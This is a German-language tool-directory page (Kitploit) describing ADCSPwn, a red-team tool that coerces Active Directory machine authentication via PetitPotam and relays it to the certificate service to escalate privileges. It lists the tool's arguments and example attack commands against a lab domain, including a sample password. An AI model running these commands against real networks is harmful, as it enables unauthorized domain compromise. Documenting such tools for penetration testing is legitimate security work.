Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ADCSPwn — Ein Tool zur Eskalation von Berechtigungen in einem Active-Directory-Netzwerk, indem es die Authentifizierung von Maschinenkonten erzwingt und an den Zertifikatsdienst weiterleitet. | Kitploit
Tools/GitHubGitHub/bats3c/adcspwn
Privilege EscalationExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubbats3c/adcspwn

ADCSPwn

Ein Tool zur Eskalation von Berechtigungen in einem Active-Directory-Netzwerk, indem es die Authentifizierung von Maschinenkonten erzwingt und an den Zertifikatsdienst weiterleitet.

Repository anzeigen
878127vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ADCSPwn

Ein Tool zur Eskalation von Berechtigungen in einem Active Directory-Netzwerk, indem es die Authentifizierung von Computerkonten erzwingt (Petitpotam) und an den Zertifikatsdienst weiterleitet.

Nutzung

Führen Sie ADCSPwn in Ihrem Zielnetzwerk aus.

root@kitploit:~
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec
Contributor: @424f424f -  Black Hills Information Security

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

Required arguments:
adcs            -       This is the address of the AD CS server which authentication will be relayed to.

Optional arguments:
secure          -       Use HTTPS with the certificate service.
port            -       The port ADCSPwn will listen on.
remote          -       Remote machine to trigger authentication from.
username        -       Username for non-domain context.
password        -       Password for non-domain context.
dc              -       Domain controller to query for Certificate Templates (LDAP).
unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output          -       Output path to store base64 generated crt.

Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share

Danksagungen

  • @harmj0y & @tifkin_ für ihr Whitepaper, das dieses Problem detailliert beschreibt.
  • @topotam77 für die Demonstration, wie EfsRpcOpenFileRaw missbraucht werden kann.
Tool herunterladen